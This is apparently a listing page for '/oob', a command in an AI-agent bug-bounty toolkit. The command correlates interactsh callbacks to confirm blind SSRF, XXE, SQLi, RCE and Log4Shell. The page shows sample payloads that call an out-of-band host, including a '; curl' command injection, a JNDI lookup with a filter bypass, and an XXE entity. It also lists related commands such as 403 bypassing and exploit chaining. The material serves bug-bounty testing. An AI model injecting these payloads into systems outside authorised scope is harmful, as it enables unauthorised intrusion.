arsenal
Show which external bug-bounty tools are installed on this machine and print install hints for the missing ones. Curated from high-signal repos. Use to…
Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
$ npx -y skills add shuvonsec/claude-bug-bounty --agent claude-codeHow it fires
How this command gets triggered: by you, by Claude, or both.
/oobContext preview
What this command does when you run it.
Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
description: Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
Confirm **blind** vulnerabilities that have no in-band signal. Wraps ProjectDiscovery's `interactsh-client`: generates payloads embedding a unique OOB hostname per injection point, then correlates inbound DNS/HTTP/SMTP interactions back to the exact payload — turning un-provable blind bugs into confirmed ones.
> Needs `interactsh-client` installed (`/arsenal interactsh-client` for the > install hint). Payload generation + correlation work offline without it.
# 1. start the listener (prints your OOB domain, streams interactions as JSON) /oob --listen > inter.jsonl # 2. generate payloads for that domain and inject them into the target /oob --payloads cXXXX.oast.fun --class ssrf,xxe,sqli # 3. correlate received callbacks to the payload that caused them /oob --correlate inter.jsonl --payloads-file payloads.json
Run directly:
tools/oob_listener.py --payloads cXXXX.oast.fun --json > payloads.json tools/oob_listener.py --listen > inter.jsonl tools/oob_listener.py --correlate inter.jsonl --payloads-file payloads.json
| Class | Sample payload | |---|---| | blind SSRF | `http://<uid>.<oob>/` (+ `@127.0.0.1`, gopher bypass forms) | | blind XXE | `<!ENTITY x SYSTEM "http://<uid>.<oob>/x">` + OOB-DTD exfil | | blind SQLi | MSSQL `xp_dirtree`, MySQL `LOAD_FILE`, Oracle `UTL_HTTP`, Postgres `COPY…PROGRAM` | | blind RCE | `; curl http://<uid>.<oob>/`, `$(…)`, backticks, `\| ping`, PowerShell | | Log4Shell | `${jndi:ldap://<uid>.<oob>/a}` (+ `${lower:j}` filter bypass) |
Without OOB, the agent **cannot confirm** blind SSRF/XXE/SQLi/RCE — an entire band of Critical bugs was structurally out of reach. Each payload carries a unique marker (`ssrf-<random>.<oob>`) so a received callback proves *which* injection point fired, ready to drop straight into a report.
AI-powered bug bounty hunting toolkit that works with or without subscription.
Repo: shuvonsec/claude-bug-bounty
Show which external bug-bounty tools are installed on this machine and print install hints for the missing ones. Curated from high-signal repos. Use to…
Run autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot…
HIBP k-anonymity check on a password wordlist. Enriches each password with its breach count, ranks DESC. Free API (no key), only first 5 chars of SHA-1 sent.…
Probe a 403/401 endpoint with the most-paid bypass tricks (header injection, path encoding, method swap, WAF fingerprint, vendor-specific). Wraps byp4xx when…
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata,…
Sweep cloud assets for a target — public S3/Azure/GCP buckets via S3Scanner and cloud_enum, plus CloudFlare-bypassed origin IPs via CloudFail (or built-in…